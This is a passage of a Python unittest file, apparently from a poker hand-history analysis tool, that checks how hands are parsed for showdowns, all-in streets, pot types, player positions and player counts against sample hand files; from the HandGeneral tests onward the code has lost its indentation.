        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'kr'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual('call 2bet', tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
        strt, plr = 'flop', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'flop', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'turn', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'sf'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
        strt, plr = 'river', 'zw'
        tmp = Float(hand, strt, plr)
        self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
class TestHandGeneral(unittest.TestCase):
def test_sd(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sd(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sd(), msg=file)
def test_sf(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sf(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sf(), msg=file)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sf(), msg=file)
def test_st(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.st(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.st(), msg=file)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.st(), msg=file)
def test_sr(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sr(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sr(), msg=file)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sr(), msg=file)
def test_ai(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'p-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('PREFLOP', tmp.ai(), msg=file)
file = 'p-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
file = 'f-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('FLOP', tmp.ai(), msg=file)
file = 'f-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
file = 't-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('TURN', tmp.ai(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
file = 'r-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('RIVER', tmp.ai(), msg=file)
file = 'r-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
def test_pot_2bet(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_2bet(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_2bet(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_2bet(), msg=file)
def test_pot_3bet(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_3bet(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_3bet(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_3bet(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_3bet(), msg=file)
def test_pot_4bet(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_4bet(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_4bet(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_4bet(), msg=file)
file = '5b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_4bet(), msg=file)
def test_pot_5bet_plus(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_5bet_plus(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_5bet_plus(), msg=file)
file = '5b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_5bet_plus(), msg=file)
file = '6b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_5bet_plus(), msg=file)
def test_open_pos_nr(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.open_pos_nr(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(1, tmp.open_pos_nr(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(4, tmp.open_pos_nr(), msg=file)
file = 'izo.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(4, tmp.open_pos_nr(), msg=file)
def test_three_bet_pos_nr(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.three_bet_pos_nr(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.three_bet_pos_nr(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(1, tmp.three_bet_pos_nr(), msg=file)
file = 'izo.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(1, tmp.three_bet_pos_nr(), msg=file)
def test_four_bet_pos_nr(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.four_bet_pos_nr(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.four_bet_pos_nr(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(3, tmp.four_bet_pos_nr(), msg=file)
def test_nr_of_players(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(6, tmp.nr_of_players(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(6, tmp.nr_of_players(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(5, tmp.nr_of_players(), msg=file)
class TestPlayerGeneral(unittest.TestCase):
def test_sd(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sd(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sd(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
file = 'r.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
player = '+Kolobok_AJ'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
player = 'wyzh250'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sd(), msg=file + ' ' + player)
def test_wsd(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.wsd(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
file = 'r.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
player = '+Kolobok_AJ'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
player = 'wyzh250'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.wsd(), msg=file + ' ' + player)
def test_sf(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sf(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sf(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sf(), msg=file + ' ' + player)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sf(), msg=file + ' ' + player)
player = 'g2'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sf(), msg=file + ' ' + player)
def test_st(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.st(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.st(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.st(), msg=file + ' ' + player)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.st(), msg=file + ' ' + player)
player = 'g2'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.st(), msg=file + ' ' + player)
def test_sr(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sr(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(True, tmp.sr(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sr(), msg=file + ' ' + player)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sr(), msg=file + ' ' + player)
player = 'g2'
tmp = PlayerGeneral(hand, player)
self.assertEqual(False, tmp.sr(), msg=file + ' ' + player)
def test_ai(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'p-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual('PREFLOP', tmp.ai(), msg=file + ' ' + player)
player = 'Sashabur'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'p-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual('PREFLOP', tmp.ai(), msg=file + ' ' + player)
player = 'Sashabur'
tmp = PlayerGeneral(hand, player)
self.assertEqual('PREFLOP', tmp.ai(), msg=file + ' ' + player)
player = 'DayaShip'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'f-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Ivo.S06'
tmp = PlayerGeneral(hand, player)
self.assertEqual('FLOP', tmp.ai(), msg=file + ' ' + player)
player = 'lagun777'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'f-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'LarryTheStar'
tmp = PlayerGeneral(hand, player)
self.assertEqual('FLOP', tmp.ai(), msg=file + ' ' + player)
player = 'tumedico.com'
tmp = PlayerGeneral(hand, player)
self.assertEqual('FLOP', tmp.ai(), msg=file + ' ' + player)
player = 'asdEmo'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'shenglongdou'
tmp = PlayerGeneral(hand, player)
self.assertEqual('TURN', tmp.ai(), msg=file + ' ' + player)
player = 'DayaShip'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 't-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'pokerdogg45'
tmp = PlayerGeneral(hand, player)
self.assertEqual('TURN', tmp.ai(), msg=file + ' ' + player)
player = 'titanik80'
tmp = PlayerGeneral(hand, player)
self.assertEqual('TURN', tmp.ai(), msg=file + ' ' + player)
player = 'SVMono'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'r-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Juliutzzz'
tmp = PlayerGeneral(hand, player)
self.assertEqual('RIVER', tmp.ai(), msg=file + ' ' + player)
player = 'Oscaryynn'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
file = 'r-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'SanikQ3'
tmp = PlayerGeneral(hand, player)
self.assertEqual('RIVER', tmp.ai(), msg=file + ' ' + player)
player = 'alexsile84'
tmp = PlayerGeneral(hand, player)
self.assertEqual('RIVER', tmp.ai(), msg=file + ' ' + player)
player = 'cinfinite23'
tmp = PlayerGeneral(hand, player)
self.assertEqual(None, tmp.ai(), msg=file + ' ' + player)
def test_pos_nr(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'p-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'Vovchique'
tmp = PlayerGeneral(hand, player)
self.assertEqual(4, tmp.pos_nr(), msg=file + ' ' + player)
player = 'Sashabur'
tmp = PlayerGeneral(hand, player)
self.assertEqual(1, tmp.pos_nr(), msg=file + ' ' + player)
player = 'DayaShip'
tmp = PlayerGeneral(hand, player)
self.assertEqual(6, tmp.pos_nr(), msg=file + ' ' + player)
player = 'markgr111'
tmp = PlayerGeneral(hand, player)
self.assertEqual(5, tmp.pos_nr(), msg=file + ' ' + player)
player = 'LarryTheStar'
tmp = PlayerGeneral(hand, player)
self.assertEqual(3, tmp.pos_nr(), msg=file + ' ' + player)
player = 'Andy Wolf'
tmp = PlayerGeneral(hand, player)
self.assertEqual(2, tmp.pos_nr(), msg=file + ' ' + player)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'zxcvbnm577'
tmp = PlayerGeneral(hand, player)
self.assertEqual(2, tmp.pos_nr(), msg=file + ' ' + player)
player = 'satisfied04'
tmp = PlayerGeneral(hand, player)
self.assertEqual(5, tmp.pos_nr(), msg=file + ' ' + player)
player = 'neamtzul82'
tmp = PlayerGeneral(hand, player)
self.assertEqual(4, tmp.pos_nr(), msg=file + ' ' + player)
player = 'gaHy_HaXeP'
tmp = PlayerGeneral(hand, player)
self.assertEqual(1, tmp.pos_nr(), msg=file + ' ' + player)
player = 'P308mnlt'
tmp = PlayerGeneral(hand, player)
self.assertEqual(3, tmp.pos_nr(), msg=file + ' ' + player)
class TestFacingOpp(unittest.TestCase):
def test_self_better(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in3gr3r__F__XXX__T__XBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._better(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('zw', tmp._better(),
msg=file + ' ' + street + ' ' + player)
def test_self_raiser(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual(None, tmp._raiser(),
msg=file + ' ' + street + ' ' + player)
street, player = 'turn', 'sf'
tmp = FacingOpp(hand, street, player)
self.assertEqual('zw', tmp._raiser(),
msg=file + ' ' + street + ' ' + player)
